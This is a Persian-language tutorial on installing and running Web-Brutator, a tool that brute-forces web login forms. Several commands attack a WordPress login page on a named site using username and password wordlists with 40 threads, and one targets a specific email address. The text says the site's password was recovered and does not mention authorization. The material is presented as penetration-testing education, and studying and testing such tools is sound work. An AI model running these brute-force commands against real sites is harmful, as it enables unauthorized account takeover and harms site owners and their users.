در این آموزش ما به بررسی یکی از ابزار های فوق العاده جالب بروت فورس صفحات لاگین یا همان ورود میپردازیم، که نام آن Web-Brutator است. ابزار Web-brutator به طور خودکار و اتوماتیک می تواند فرم های استاندارد احراز هویت و فرم های لاگین به وب را شناسایی کرده و bruteforce را به طور خودکار انجام دهد. این ویژگی از طریق فرم استاندارد ماژول در دسترس است ، و همچنین مبتنی بر چندین روش اکتشافی است.
خب نگاهی بیندازیم.
اول از همه ما باید، قبل از اقدام به نصب این ابزار، برخی از وابستگی ها را در سیستم kali linux خود نصب کنیم.
apt install python apt install python3 apt install python-pip apt install python3-pip
اکنون دستور git clone را اجرا می کنیم تا این ابزار را از gihtub بارگیری کنیم و سپس به داخل پوشه می رویم.
git clone https://github.com/koutto/web-brutator.git cd web-brutator/
همانطور که می دانیم هر ابزار به ابزار دیگری نیز نیاز دارد و به آن وابستگی دارد، بنابراین دستور زیر را برای نصب این ابزارها اجرا خواهیم کرد.
python3 -m pip install -r requirements.txt
و تمام! همانطور که در تصویر زیر مشاهده می کنید ابزار ما با موفقیت راه اندازی شده است. با افزودن دستور “-h” می توانید تمام جزئیات مربوط به آن را بدست آورید.
python3 web-brutator.py -h
اکنون می توانید لیست کلمات خود را و مورد مورد نیاز دیگر مربوط به کاربر را قرار دهید. پس از تنظیم تمام جزئیات مورد نیاز در دستور، آن را اجرا کنید.
python3 web-brutator.py --target standardform --url https://secnhack.in/wp-login.php -U user.txt -P pass.txt -s -t 40 -v
و حالا ! همانطور که می بینید رمز عبور وب سایت موردنظر همراه با شناسایی خودکار CMS به راحتی انجام شده است.
بنابراین ، اگر قبلاً نام کاربری یا آدرس ایمیل مورد نظر را می دانید ، می توانید آن را با استفاده از گزینه “-u” وارد کنید.
python3 web-brutator.py --target standardform --url https://secnhack.in/wp-login.php -u sg5479845@gmail.com -P pass.txt -s -t 40 -v
عالی! نتایج دوباره بسیار چشمگیر است و می بینید که ما دوباره رمز ورود به وب سایت هدف را بدست آورده ایم.
به همین ترتیب ، ویژگی های زیادی در داخل این ابزار وجود دارد که می توانید یکی یکی از آنها استفاده کنید و با به دست آوردن جزئیات ورود به سیستم ، از آنها استفاده کنید.
خب، ما این در این آموزش به یکی از مباحث امنیت و تست نفوذ پرداختیم، یعنی کرک صفحه ی ورود با Web-Brutator.
امیدواریم از این آموزش بهره کافی را برده باشید.
X